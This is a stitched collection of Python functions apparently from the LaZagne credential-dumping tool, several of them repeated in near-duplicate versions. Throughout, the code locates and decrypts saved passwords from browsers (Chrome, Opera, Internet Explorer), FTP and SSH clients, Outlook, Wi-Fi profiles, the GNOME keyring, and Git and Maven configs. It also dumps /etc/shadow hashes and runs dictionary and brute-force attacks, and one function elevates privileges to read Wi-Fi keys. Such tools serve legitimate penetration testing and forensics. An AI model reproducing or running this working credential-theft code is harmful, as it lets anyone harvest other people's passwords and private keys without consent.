def retrieve_password(self): # print title Header().title_debug('Outlook') accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE keyPath = 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook' try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) except: print_debug('WARNING', 'Outlook not installed.\nAn error occurs retrieving the registry key.\nKey = %s' % keyPath) return num = win32api.RegQueryInfoKey(hkey)[0] pwdFound = [] for x in range(0, num): name = win32api.RegEnumKey(hkey, x) skey = win32api.RegOpenKey(hkey, name, 0, accessRead) num_skey = win32api.RegQueryInfoKey(skey)[0] if num_skey != 0: for y in range(0, num_skey): name_skey = win32api.RegEnumKey(skey, y) sskey = win32api.RegOpenKey(skey, name_skey, 0, accessRead) num_sskey = win32api.RegQueryInfoKey(sskey)[1] for z in range(0, num_sskey): k = win32api.RegEnumValue(sskey, z) if 'password' in k[0].lower(): values = self.retrieve_info(sskey, name_skey) # write credentials into a text file if len(values) != 0: pwdFound.append(values) # print the results print_output("Outlook", pwdFound)
def run(self): """ Main function """ # Print title title = "GitForWindows" Header().title_info(title) # According to the "git-credential-store" documentation: # Build a list of locations in which git credentials can be stored locations = [] locations.append(os.environ.get("USERPROFILE") + "\\.git-credentials") locations.append(os.environ.get("USERPROFILE") + "\\.config\\git\\credentials") if "XDG_CONFIG_HOME" in os.environ: locations.append(os.environ.get("XDG_CONFIG_HOME") + "\\git\\credentials") # Apply the password extraction on the defined locations pwd_found = [] for location in locations: pwd_found += self.extract_credentials(location) # Filter duplicates final_pwd_found = [] duplicates_track = [] for pwd in pwd_found: pwd_id = pwd["URL"] + pwd["Username"] + pwd["Password"] if pwd_id not in duplicates_track: final_pwd_found.append(pwd) duplicates_track.append(pwd_id) # Print the results print_output(title, final_pwd_found)
def read_file(self, filepath): f = open(filepath, 'r') pwdFound = [] for ff in f.readlines(): values = {} info = ff.split(';') for i in info: i = i.split('=') if i[0] == 'Name': values['Name'] = i[1] if i[0] == 'Server': values['Server'] = i[1] if i[0] == 'Port': values['Port'] = i[1] if i[0] == 'User': values['User'] = i[1] if i[0] == "Password": if i[1] != '1' and i[1] != '0': values['Password'] = self.decode(i[1]) # used to save the password if it is an anonymous authentication if values['User'] == 'anonymous' and 'Password' not in values.keys(): values['Password'] = '******' pwdFound.append(values) # print the results print_output('FTP Navigator', pwdFound)
def get_key_info(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\\FTPware\\CoreFTP\\Sites', 0, accessRead) except: return False num_profiles = win32api.RegQueryInfoKey(key)[0] pwdFound = [] for n in range(num_profiles): name_skey = win32api.RegEnumKey(key, n) skey = win32api.RegOpenKey(key, name_skey, 0, accessRead) num = win32api.RegQueryInfoKey(skey)[1] values = {} for nn in range(num): k = win32api.RegEnumValue(skey, nn) if k[0] == 'Host': values['Host'] = k[1] if k[0] == 'Port': values['Port'] = k[1] if k[0] == 'User': values['User'] = k[1] pwdFound.append(values) if k[0] == 'PW': try: values['Password'] = self.decrypt(k[1]) except: values['Password'] = '******' # print the results print_output('CoreFTP', pwdFound)
def run(self): Header().title_info('System account (from /etc/shadow)') # check root access if self.root_access(): if self.check_file_access(): shadowFile = open (self.filestr,'r') for line in shadowFile.readlines(): _hash = line.replace('\n', '') line = _hash.split(':') # check if a password is defined if not line[1] in [ 'x', '*','!' ]: user = line[0] cryptPwd = line[1] # save each hash non empty self.hash += _hash + '\n' # try dictionary and bruteforce attack self.attack(user, cryptPwd) values = {'Category' : 'Hash', 'Hash' : self.hash } self.pwdFound.append(values) # print the results print_output('System account (from /etc/shadow)', self.pwdFound)
def retrieve_password(self): # print the title Header().title_debug('Wifi (from Network Manager)') directory = '/etc/NetworkManager/system-connections' if os.path.exists(directory): if os.getuid() != 0: print_debug('INFO', 'You need more privileges (run it with sudo)\n') wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))] pwdFound = [] for w in wireless_ssid: cp = RawConfigParser() cp.read(os.path.join(directory, w)) values = {} values['SSID'] = w if cp.sections(): for section in cp.sections(): if 'wireless' in section: for i in cp.items(section): values[i[0]] = i[1] # write credentials into a text file if len(values) != 0: pwdFound.append(values) # print the results print_output('Wifi', pwdFound) else: print_debug('ERROR', 'the path "%s" does not exist' %(directory))
def run(self): # print title Header().title_info('Dot Net Passport') a = self.get_creds() pwd = '' pwdFound = [] if a: for i in a: values = {} if i['Type'] == win32cred.CRED_TYPE_DOMAIN_VISIBLE_PASSWORD: cipher_text = i['CredentialBlob'] pwd = self.Win32CryptUnprotectData(cipher_text, self.get_entropy()) if pwd != 'failed': values['TargetName'] = i['TargetName'] if i['UserName'] is not None: values['Username'] = i['UserName'] try: values['Password'] = pwd.decode('utf16') except Exception,e: print_debug('DEBUG', '{0}'.format(e)) values['INFO'] = 'Error decoding the password' pwdFound.append(values) # print the results print_output('Dot Net Passport', pwdFound)
def retrieve_password(self): # print the title Header().title_debug('Wifi (from Network Manager)') directory = '/etc/NetworkManager/system-connections' if os.path.exists(directory): if os.getuid() != 0: print_debug('INFO', 'You need more privileges (run it with sudo)\n') wireless_ssid = [ f for f in os.listdir(directory) if os.path.isfile(os.path.join(directory,f))] pwdFound = [] for w in wireless_ssid: cp = RawConfigParser() cp.read(os.path.join(directory, w)) values = {} values['SSID'] = w if cp.sections(): for section in cp.sections(): if 'wireless' in section: for i in cp.items(section): values[i[0]] = i[1] # write credentials into a text file if len(values) != 0: pwdFound.append(values) # print the results print_output('Wifi', pwdFound) else: print_debug('WARNING', 'the path "%s" does not exist' %(directory))
def decipher_new_version(self, path): database_path = path + os.sep + 'Login Data' if os.path.exists(database_path): # Connect to the Database conn = sqlite3.connect(database_path) cursor = conn.cursor() # Get the results try: cursor.execute('SELECT action_url, username_value, password_value FROM logins') except Exception,e: print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', 'Opera seems to be used, the database is locked. Kill the process and try again !') return pwdFound = [] for result in cursor.fetchall(): values = {} # Decrypt the Password password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] if password: values['Site'] = result[0] values['Username'] = result[1] values['Password'] = password pwdFound.append(values) # print the results print_output("Opera", pwdFound)
def parse_results(self, passwords): cpt = 0 values = {} pwdFound = [] for password in passwords: # date (begin of the sensitive data) match=re.search(r'(\d+-\d+-\d+)', password) if match: values = {} cpt = 0 tmp_cpt = 0 # after finding 2 urls if cpt == 2: tmp_cpt += 1 if tmp_cpt == 2: values['User'] = password print 'User:'******'Password'] = password # url match=re.search(r'^http', password) if match: cpt +=1 if cpt == 1: tmp_url = password elif cpt == 2: values['URL'] = tmp_url pwdFound.append(values) # print the results print_output("Opera", pwdFound)
def run(self): # print title Header().title_info('Kalypso Media Launcher') creds = [] key = 'lwSDFSG34WE8znDSmvtwGSDF438nvtzVnt4IUv89' if 'APPDATA' in os.environ: inifile = os.environ['APPDATA'] + '\\Kalypso Media\\Launcher\\launcher.ini' else: print_debug('ERROR', 'The APPDATA environment variable is not defined.') return # The actual user details are stored in *.userdata files if not os.path.exists(inifile): print_debug('INFO', 'The Kalypso Media Launcher doesn\'t appear to be installed.') return config = ConfigParser.ConfigParser() config.read(inifile) values = {} values['Login'] = config.get('styx user','login') # get the encoded password cookedpw = base64.b64decode(config.get('styx user','password')); values['Password'] = self.xorstring(cookedpw, key) creds.append(values) print_output("Kalypso Media Launcher", creds)
def run(self, historic=''): # print title Header().title_debug('Internet Explorer') # write the binary file try: self.write_binary_file() except: print_debug('ERROR', '%s cannot be created, check your file permission' % dll_name) list = [] if historic: if os.path.exists(historic): f = open(historic, 'r') for line in f: list.append(line.strip()) else: print_debug('WARNING', 'The text file %s does not exist' % historic) # retrieve the urls from the history hash_tables = self.get_hash_table(list) # open the registry accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE keyPath = 'Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2' failed = False try: hkey = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, keyPath, 0, accessRead) except: failed = True nb_site = 0 nb_pass_found = 0 if failed == False: num = win32api.RegQueryInfoKey(hkey)[1] for x in range(0, num): k = win32api.RegEnumValue(hkey, x) if k: nb_site +=1 for h in hash_tables: # both hash are similar, we can decipher the password if h[1] == k[0][:40].lower(): nb_pass_found += 1 cipher_text = k[1] self.decipher_password(cipher_text, h[0]) break # print the results print_output("Internet Explorer", pwdFound) # manage errors if nb_site == 0: print_debug('INFO', 'No credentials stored in the IE browser.') elif nb_site > nb_pass_found: print_debug('ERROR', '%s hashes have not been decrypted, the associate website used to decrypt the passwords has not been found' % str(nb_site - nb_pass_found)) else: print_debug('INFO', 'No password stored.\nThe registry key storing the ie password has not been found.\nKey: %s' % keyPath)
def get_infos(self, path, passphrase, salt): for p in os.listdir(path): if p.startswith('o.jdeveloper.db.connection'): path += os.sep + p break xml_file = path + os.sep + 'connections.xml' if os.path.exists(xml_file): tree = ET.ElementTree(file=xml_file) pwdFound = [] values = {} for elem in tree.iter(): if 'addrType' in elem.attrib.keys(): if elem.attrib['addrType'] == 'sid': for e in elem.getchildren(): values['sid'] = e.text elif elem.attrib['addrType'] == 'port': for e in elem.getchildren(): values['port'] = e.text elif elem.attrib['addrType'] == 'user': for e in elem.getchildren(): values['user'] = e.text elif elem.attrib['addrType'] == 'ConnName': for e in elem.getchildren(): values['Connection Name'] = e.text elif elem.attrib['addrType'] == 'customUrl': for e in elem.getchildren(): values['custom Url'] = e.text elif elem.attrib['addrType'] == 'SavePassword': for e in elem.getchildren(): values['SavePassword'] = e.text elif elem.attrib['addrType'] == 'hostname': for e in elem.getchildren(): values['hostname'] = e.text elif elem.attrib['addrType'] == 'password': for e in elem.getchildren(): pwd = self.decrypt(salt, e.text, passphrase) values['password'] = pwd elif elem.attrib['addrType'] == 'driver': for e in elem.getchildren(): values['driver'] = e.text # password found pwdFound.append(values) # print the results print_output("SQL Developer", pwdFound) else: print_debug('ERROR', 'The xml file connections.xml containing the passwords has not been found.')
def run(self): # print the title Header().title_debug('Gnome keyring') if os.getuid() == 0: print_debug('INFO', 'Do not run with root privileges)\n') return try: import gnomekeyring if len(gnomekeyring.list_keyring_names_sync()) > 0: pwdFound = [] for keyring in gnomekeyring.list_keyring_names_sync(): for id in gnomekeyring.list_item_ids_sync(keyring): values = {} item = gnomekeyring.item_get_info_sync(keyring, id) attr = gnomekeyring.item_get_attributes_sync( keyring, id) if attr: if item.get_display_name(): values["Item"] = item.get_display_name() if attr.has_key('server'): values["Server"] = attr['server'] if attr.has_key('protocol'): values["Protocol"] = attr['protocol'] if attr.has_key('unique'): values["Unique"] = attr['unique'] if attr.has_key('domain'): values["Domain"] = attr['domain'] if attr.has_key('origin_url'): values["Origin_url"] = attr['origin_url'] if attr.has_key('username_value'): values["Username"] = attr['username_value'] if attr.has_key('user'): values["Username"] = attr['user'] if item.get_secret(): values["Password"] = item.get_secret() # write credentials into a text file if len(values) != 0: pwdFound.append(values) # print the results print_output('Gnome keyring', pwdFound) else: print_debug('WARNING', 'The Gnome Keyring wallet is empty') except Exception, e: print_debug( 'ERROR', 'An error occurs with the Gnome Keyring wallet: {0}'.format(e))
def run(self): # print the title Header().title_info('Gnome keyring') if os.getuid() == 0: print_debug('WARNING', 'Do not run it with root privileges)\n') return try: import gnomekeyring if len(gnomekeyring.list_keyring_names_sync()) > 0: pwdFound = [] for keyring in gnomekeyring.list_keyring_names_sync(): for id in gnomekeyring.list_item_ids_sync(keyring): values = {} item = gnomekeyring.item_get_info_sync(keyring, id) attr = gnomekeyring.item_get_attributes_sync(keyring, id) if attr: if item.get_display_name(): values["Item"] = item.get_display_name() if attr.has_key('server'): values["Server"] = attr['server'] if attr.has_key('protocol'): values["Protocol"] = attr['protocol'] if attr.has_key('unique'): values["Unique"] = attr['unique'] if attr.has_key('domain'): values["Domain"] = attr['domain'] if attr.has_key('origin_url'): values["Origin_url"] = attr['origin_url'] if attr.has_key('username_value'): values["Username"] = attr['username_value'] if attr.has_key('user'): values["Username"] = attr['user'] if item.get_secret(): values["Password"] = item.get_secret() # write credentials into a text file if len(values) != 0: pwdFound.append(values) # print the results print_output('Gnome keyring', pwdFound) else: print_debug('WARNING', 'The Gnome Keyring wallet is empty') except Exception,e: print_debug('ERROR', 'An error occurs with the Gnome Keyring wallet: {0}'.format(e))
def run(self): # print title Header().title_info('Wifi') if not windll.Shell32.IsUserAnAdmin(): print_debug('WARNING', '[!] This script should be run as admin!') return else: if 'ALLUSERSPROFILE' in os.environ: directory = os.environ['ALLUSERSPROFILE'] + os.sep + 'Microsoft\Wlansvc\Profiles\Interfaces' else: print_debug('ERROR', 'Environment variable (ALLUSERSPROFILE) has not been found.') return if not os.path.exists(directory): print_debug('INFO', 'No credentials found.\nFile containing passwords not found:\n%s' % directory) return try: print_debug('INFO', '[!] Trying to elevate our privilege') get_system_priv() print_debug('INFO', '[!] Elevation ok - Passwords decryption is in progress') except Exception,e: print_debug('DEBUG', '{0}'.format(e)) print_debug('ERROR', '[!] An error occurs during the privilege elevation process. Wifi passwords have not been decrypted') time.sleep(5) # read temp file containing all passwords found pwdFound = [] filepath = tempfile.gettempdir() + os.sep + 'TEMP123A.txt' # the file has not been created yet if not os.path.exists(filepath): time.sleep(5) if os.path.exists(filepath): cp = RawConfigParser() cp.read(filepath) for section in cp.sections(): values = {} for c in cp.items(section): values[str(c[0])] = str(c[1]) pwdFound.append(values) # remove file on the temporary directory os.remove(filepath) # print the results print_output("Wifi", pwdFound) else: print_debug('INFO', 'No passwords found')
def run(self): """ Main function: - For encrypted password, provides the encrypted version of the password with the master password in order to allow "LaZagne run initiator" the use the encryption parameter associated with the version of Maven because encryption parameters can change between version of Maven. - "LaZagne run initiator" can also use the encrypted password and the master password "AS IS" in a Maven distribution to access repositories. See https://github.com/jelmerk/maven-settings-decoder See https://github.com/sonatype/plexus-cipher/blob/master/src/main/java/org/sonatype/plexus/components/cipher/PBECipher.java """ # Print title title = "MavenRepositories" Header().title_info(title) # Extract the master password master_password = self.extract_master_password() # Extract all available repositories credentials repos_creds = self.extract_repositories_credentials() # Parse and process the list of repositories's credentials # 3 cases are handled: # => Authentication using password protected with the master password (encrypted) # => Authentication using password not protected with the master password (plain text) # => Authentication using private key pwd_found = [] for creds in repos_creds: values = {} values["Id"] = creds["id"] values["Username"] = creds["username"] if not self.use_key_auth(creds): pwd = creds["password"].strip() # Case for authentication using password protected with the master password if pwd.startswith("{") and pwd.endswith("}"): values["SymetricEncryptionKey"] = master_password values["PasswordEncrypted"] = pwd else: values["Password"] = pwd else: # Case for authentication using private key pk_file_location = creds["privateKey"] pk_file_location = pk_file_location.replace("${user.home}", os.environ.get("USERPROFILE")) with open(pk_file_location, "r") as pk_file: values["PrivateKey"] = pk_file.read() if "passphrase" in creds: values["Passphrase"] = creds["passphrase"] pwd_found.append(values) # Print the results print_output(title, pwd_found)
def get_infos(self, path, passphrase, salt): xml_file = path + os.sep + 'config70/dbvis.xml' if os.path.exists(xml_file): tree = ET.ElementTree(file=xml_file) pwdFound = [] for e in tree.findall('Databases/Database'): values = {} try: values['Connection Name'] = e.find('Alias').text except: pass try: values['Userid'] = e.find('Userid').text except: pass try: ciphered_password = e.find('Password').text try: password = self.decrypt(salt, ciphered_password, passphrase) values['Password'] = password passwordFound = True except: pass except: pass try: values['Driver'] = e.find('UrlVariables//Driver').text.strip() except: pass try: elem = e.find('UrlVariables') for ee in elem.getchildren(): for ele in ee.getchildren(): if 'Server' == ele.attrib['UrlVariableName']: values['Server'] = str(ele.text) if 'Port' == ele.attrib['UrlVariableName']: values['Port'] = str(ele.text) if 'SID' == ele.attrib['UrlVariableName']: values['SID'] = str(ele.text) except: pass if len(values) > 0: pwdFound.append(values) # print the results print_output("DbVisualizer", pwdFound)
def get_infos(self, path, passphrase, salt): xml_file = path + os.sep + "config70/dbvis.xml" if os.path.exists(xml_file): tree = ET.ElementTree(file=xml_file) pwdFound = [] for e in tree.findall("Databases/Database"): values = {} try: values["Connection Name"] = e.find("Alias").text except: pass try: values["Userid"] = e.find("Userid").text except: pass try: ciphered_password = e.find("Password").text try: password = self.decrypt(salt, ciphered_password, passphrase) values["Password"] = password passwordFound = True except: pass except: pass try: values["Driver"] = e.find("UrlVariables//Driver").text.strip() except: pass try: elem = e.find("UrlVariables") for ee in elem.getchildren(): for ele in ee.getchildren(): if "Server" == ele.attrib["UrlVariableName"]: values["Server"] = str(ele.text) if "Port" == ele.attrib["UrlVariableName"]: values["Port"] = str(ele.text) if "SID" == ele.attrib["UrlVariableName"]: values["SID"] = str(ele.text) except: pass if len(values) > 0: pwdFound.append(values) # print the results print_output("DbVisualizer", pwdFound)
def run(self): Header().title_info('Wifi (from WPA Supplicant)') if self.check_file_access(): return # check root access if os.getuid() != 0: print_debug('INFO', 'You need more privileges (run it with sudo)\n') return pwdFound = self.parse_file() print_output("wpa_supplicant", pwdFound)
def get_logins_info(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey( win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead) except: return False num_profiles = win32api.RegQueryInfoKey(key)[0] pwdFound = [] for n in range(num_profiles): name_skey = win32api.RegEnumKey(key, n) skey = win32api.RegOpenKey(key, name_skey, 0, accessRead) num = win32api.RegQueryInfoKey(skey)[1] port = '' values = {} for nn in range(num): k = win32api.RegEnumValue(skey, nn) if k[0] == 'HostName': self.set_hostname(k[1]) if k[0] == 'UserName': self.set_username(k[1]) if k[0] == 'Password': self.set_hash(k[1]) if k[0] == 'PortNumber': port = str(k[1]) if num != 0: if port == '': port = '22' try: password = self.decrypt_password() except: password = '******' values['Hostname'] = self.get_hostname() values['Port'] = port values['Username'] = self.get_username() values['Password'] = password pwdFound.append(values) # print the results print_output("WinSCP", pwdFound)
def retrieve_password(self): # print title Header().title_debug('Chrome') database_path = '' if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ: # For Win7 path_Win7 = os.environ.get('HOMEDRIVE') + os.sep + os.environ.get('HOMEPATH') + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data' # For XP path_XP = os.environ.get('HOMEDRIVE') + os.sep + os.environ.get('HOMEPATH') + '\AppData\Local\Google\Chrome\User Data\Default\Login Data' if os.path.exists(path_XP): database_path = path_XP elif os.path.exists(path_Win7): database_path = path_Win7 else: print_debug('INFO', 'Google Chrome not installed.') return else: print_debug('ERROR', 'Environment variables (HOMEDRIVE or HOMEPATH) have not been found') return # Connect to the Database conn = sqlite3.connect(database_path) cursor = conn.cursor() # Get the results try: cursor.execute('SELECT action_url, username_value, password_value FROM logins') except: print_debug('ERROR', 'Google Chrome seems to be used, the database is locked. Kill the process and try again !') return pwdFound = [] for result in cursor.fetchall(): values = {} # Decrypt the Password password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1] if password: values['Site'] = result[0] values['Username'] = result[1] values['Password'] = password pwdFound.append(values) # print the results print_output("Chrome", pwdFound)
def get_logins_info(self): accessRead = win32con.KEY_READ | win32con.KEY_ENUMERATE_SUB_KEYS | win32con.KEY_QUERY_VALUE try: key = win32api.RegOpenKey(win32con.HKEY_CURRENT_USER, 'Software\Martin Prikryl\WinSCP 2\Sessions', 0, accessRead) except: return False num_profiles = win32api.RegQueryInfoKey(key)[0] pwdFound = [] for n in range(num_profiles): name_skey = win32api.RegEnumKey(key, n) skey = win32api.RegOpenKey(key, name_skey, 0, accessRead) num = win32api.RegQueryInfoKey(skey)[1] port = '' values = {} for nn in range(num): k = win32api.RegEnumValue(skey, nn) if k[0] == 'HostName': self.set_hostname(k[1]) if k[0] == 'UserName': self.set_username(k[1]) if k[0] == 'Password': self.set_hash(k[1]) if k[0] == 'PortNumber': port = str(k[1]) if num != 0: if port == '': port = '22' try: password = self.decrypt_password() except: password = '******' values['Hostname'] = self.get_hostname() values['Port'] = port values['Username'] = self.get_username() values['Password'] = password pwdFound.append(values) # print the results print_output("WinSCP", pwdFound)
def get_infos(self, path, passphrase, salt): xml_file = path + os.sep + 'config70/dbvis.xml' if os.path.exists(xml_file): tree = ET.ElementTree(file=xml_file) pwdFound = [] values = {} for elem in tree.iter('Databases'): values = {} passwordFound = False for e in elem.iter(): if 'Alias' == e.tag: values['Connection Name'] = str(e.text) if 'Userid' == e.tag: values['Userid'] = str(e.text) if 'Password' == e.tag: ciphered_password = e.text try: password = self.decrypt(salt, ciphered_password, passphrase) values['Password'] = password passwordFound = True except: pass if 'UrlVariables' == e.tag: for el in e.getchildren(): values['Driver'] = str(el.text).strip() for ele in el.getchildren(): if 'Server' == ele.attrib['UrlVariableName']: values['Server'] = str(ele.text) if 'Port' == ele.attrib['UrlVariableName']: values['Port'] = str(ele.text) if 'SID' == ele.attrib['UrlVariableName']: values['SID'] = str(ele.text) if passwordFound: pwdFound.append(values) # print the results print_output('DbVisualizer', pwdFound)
def run(self): # print the title Header().title_info('ClawsMail') path = self.get_path() if not path: print_debug('INFO', 'ClawsMail not installed.') mode = DES.MODE_CFB if 'FreeBSD' in platform.system(): mode = DES.MODE_ECB pwdFound = self.accountrc_decrypt(path, self.get_passcrypt_key(), mode) # print the results print_output('ClawsMail', pwdFound)
def run(self): # print title Header().title_info('Galcon Fusion') creds = [] # Find the location of steam - to make it easier we're going to use a try block # 'cos I'm lazy try: with OpenKey(HKEY_CURRENT_USER, 'Software\Valve\Steam') as key: results=QueryValueEx(key, 'SteamPath') except: print_debug('INFO', 'Steam does not appear to be installed.') return if not results: print_debug('INFO', 'Steam does not appear to be installed.') return steampath=results[0] userdata = steampath + '\\userdata' # Check that we have a userdata directory if not os.path.exists(userdata): print_debug('ERROR', 'Steam doesn\'t have a userdata directory.') return # Now look for Galcon Fusion in every user files = os.listdir(userdata) for file in files: filepath = userdata + '\\' + file + '\\44200\\remote\\galcon.cfg' if not os.path.exists(filepath): continue # If we're here we should have a Galcon Fusion file with open(filepath, mode='rb') as cfgfile: # We've found a config file, now extract the creds data = cfgfile.read() values = {} values['Login'] = data[4:0x23] values['Password'] = data[0x24:0x43] creds.append(values) print_output("Galcon Fusion", creds)
def run(self): # print the title Header().title_info('ClawsMail') path = self.get_path() if not path: print_debug('INFO', 'ClawsMail not installed.') return mode = DES.MODE_CFB if 'FreeBSD' in platform.system(): mode = DES.MODE_ECB pwdFound = self.accountrc_decrypt(path, self.get_passcrypt_key(), mode) # print the results print_output('ClawsMail', pwdFound)
def run(self): values = {} pwdFound = [] # print the title Header().title_info("Environment variables") # --------- http_proxy -------- tmp = "" if "http_proxy" in os.environ: tmp = "http_proxy" elif "HTTP_Proxy" in os.environ: tmp = "HTTP_Proxy" if tmp: values["Variable"] = tmp values["Password"] = os.environ[tmp] pwdFound.append(values) # --------- https_proxy -------- tmp = "" if "https_proxy" in os.environ: tmp = "https_proxy" elif "HTTPS_Proxy" in os.environ: tmp = "HTTPS_Proxy" if tmp: values["Variable"] = tmp values["Password"] = os.environ[tmp] pwdFound.append(values) tab = ["passwd", "pwd", "pass", "password"] for i in os.environ: for t in tab: if (t.upper() in i.upper()) and (i.upper() != "PWD") and (i.upper() != "OLDPWD"): values["Variable"] = i values["Password"] = os.environ[i] pwdFound.append(values) # write credentials into a text file if len(values) != 0: # print the results print_output("Environnement variables", pwdFound) else: print_debug("INFO", "No passwords stored in the environment variables.")
def retrieve_password(self): values = {} pwdFound = [] # print the title Header().title_debug('Environnement variables') # --------- http_proxy -------- tmp = '' if 'http_proxy' in os.environ: tmp = 'http_proxy' elif 'HTTP_Proxy' in os.environ: tmp = 'HTTP_Proxy' if tmp: values["Variable"] = tmp values["Password"] = os.environ[tmp] pwdFound.append(values) # --------- https_proxy -------- tmp = '' if 'https_proxy' in os.environ: tmp = 'https_proxy' elif 'HTTPS_Proxy' in os.environ: tmp = 'HTTPS_Proxy' if tmp: values["Variable"] = tmp values["Password"] = os.environ[tmp] pwdFound.append(values) tab = ['passwd', 'pwd', 'pass', 'password'] for i in os.environ: for t in tab: if (t.upper() in i.upper()) and (i.upper() != 'PWD') and (i.upper() != 'OLDPWD'): values["Variable"] = i values["Password"] = os.environ[i] pwdFound.append(values) # write credentials into a text file if len(values) != 0: # print the results print_output('Environnement variables', pwdFound) else: print_debug('INFO', 'No passwords stored in the environment variables.')
def retrieve_password(self): # print title Header().title_debug('Generic Network') os_plateform = platform.release() a = self.get_creds() pwd = '' pwdFound = [] if a: for i in a: values = {} if i['Type'] == win32cred.CRED_TYPE_GENERIC: cipher_text = i['CredentialBlob'] if os_plateform == 'XP': pwd = self.Win32CryptUnprotectData( cipher_text, self.get_entropy()) else: pwd = cipher_text if pwd != 'failed': targetName = i['TargetName'].replace( 'Microsoft_WinInet_', '') values['TargetName'] = targetName if os_plateform == 'XP': t = targetName.split('/') targetName = t[0] if i['UserName'] is not None: values['Username'] = i['UserName'] try: values['Password'] = pwd.decode('utf16') except: values['INFO'] = 'Error decoding the password' pwdFound.append(values) # print the results print_output("Generic Network", pwdFound) else: print_debug('INFO', 'No credentials listed with the enum cred function')
def parse_xml(self, xml_file): tree = ET.ElementTree(file=xml_file) pwdFound = [] for elem in tree.iter(): values = {} try: if elem.attrib['name'].startswith('ftp') or elem.attrib['name'].startswith('ftps') or elem.attrib['name'].startswith('sftp') or elem.attrib['name'].startswith('http') or elem.attrib['name'].startswith('https'): values['URL'] = elem.attrib['name'] encrypted_password = base64.b64decode(elem.attrib['value']) password = win32crypt.CryptUnprotectData(encrypted_password, None, None, None, 0)[1] values['Password'] = password pwdFound.append(values) except: pass # print the results print_output("Cyberduck", pwdFound)
def run(self): # print title Header().title_info('Turba') creds = [] # Find the location of steam - to make it easier we're going to use a try block # 'cos I'm lazy try: with OpenKey(HKEY_CURRENT_USER, 'Software\Valve\Steam') as key: results=QueryValueEx(key, 'SteamPath') except: print_debug('INFO', 'Steam does not appear to be installed.') return if not results: print_debug('INFO', 'Steam does not appear to be installed.') return steampath=results[0] steamapps = steampath + '\\SteamApps\common' # Check that we have a SteamApps directory if not os.path.exists(steamapps): print_debug('ERROR', 'Steam doesn\'t have a SteamApps directory.') return filepath = steamapps + '\\Turba\\Assets\\Settings.bin' if not os.path.exists(filepath): print_debug('INFO', 'Turba doesn\'t appear to be installed.') return # If we're here we should have a valid config file file with open(filepath, mode='rb') as filepath: # We've found a config file, now extract the creds data = filepath.read() values = {} chunk=data[0x1b:].split('\x0a') values['Login'] = chunk[0] values['Password'] = chunk[1] creds.append(values) print_output("Turba", creds)
def run(self): # print title Header().title_info('Turba') creds = [] # Find the location of steam - to make it easier we're going to use a try block # 'cos I'm lazy try: with OpenKey(HKEY_CURRENT_USER, 'Software\Valve\Steam') as key: results = QueryValueEx(key, 'SteamPath') except: print_debug('INFO', 'Steam does not appear to be installed.') return if not results: print_debug('INFO', 'Steam does not appear to be installed.') return steampath = results[0] steamapps = steampath + '\\SteamApps\common' # Check that we have a SteamApps directory if not os.path.exists(steamapps): print_debug('ERROR', 'Steam doesn\'t have a SteamApps directory.') return filepath = steamapps + '\\Turba\\Assets\\Settings.bin' if not os.path.exists(filepath): print_debug('INFO', 'Turba doesn\'t appear to be installed.') return # If we're here we should have a valid config file file with open(filepath, mode='rb') as filepath: # We've found a config file, now extract the creds data = filepath.read() values = {} chunk = data[0x1b:].split('\x0a') values['Login'] = chunk[0] values['Password'] = chunk[1] creds.append(values) print_output("Turba", creds)
def run(self): # print title Header().title_info('Pidgin') if constant.appdata: directory = '%s\.purple' % constant.appdata path = os.path.join(directory, 'accounts.xml') elif 'APPDATA' in os.environ: directory = os.environ['APPDATA'] + '\.purple' path = os.path.join(directory, 'accounts.xml') else: print_debug('ERROR', 'The APPDATA environment variable is not defined.') return if os.path.exists(path): tree = ET.ElementTree(file=path) root = tree.getroot() accounts = root.getchildren() pwdFound = [] for a in accounts: values = {} aa = a.getchildren() noPass = True for tag in aa: cpt = 0 if tag.tag == 'name': cpt = 1 values['Login'] = tag.text if tag.tag == 'password': values['Password'] = tag.text noPass = False if noPass == False: pwdFound.append(values) # print the results print_output("Pidgin", pwdFound) else: print_debug('INFO', 'Pidgin not installed.')
def run(self): # print title Header().title_info("Skype") if "APPDATA" in os.environ: directory = os.environ["APPDATA"] + "\Skype" if os.path.exists(directory): # retrieve the key used to build the salt key = self.get_regkey() if key == "failed": print_debug("ERROR", "The salt has not been retrieved") else: pwdFound = [] for d in os.listdir(directory): if os.path.exists(directory + os.sep + d + os.sep + "config.xml"): values = {} try: values["username"] = d # get encrypted hash from the config file enc_hex = self.get_hash_credential(directory + os.sep + d + os.sep + "config.xml") if enc_hex == "failed": print_debug("WARNING", "No credential stored on the config.xml file.") else: # decrypt the hash to get the md5 to brue force values["hash_md5"] = self.get_md5_hash(enc_hex, key) values["shema to bruteforce"] = values["username"] + "\\nskyper\\n<password>" # Try a dictionary attack on the hash password = self.dictionary_attack(values["username"], values["hash_md5"]) if password: values["password"] = password pwdFound.append(values) except Exception, e: print_debug("DEBUG", "{0}".format(e)) # print the results print_output("Skype", pwdFound) else: print_debug("INFO", "Skype not installed.")
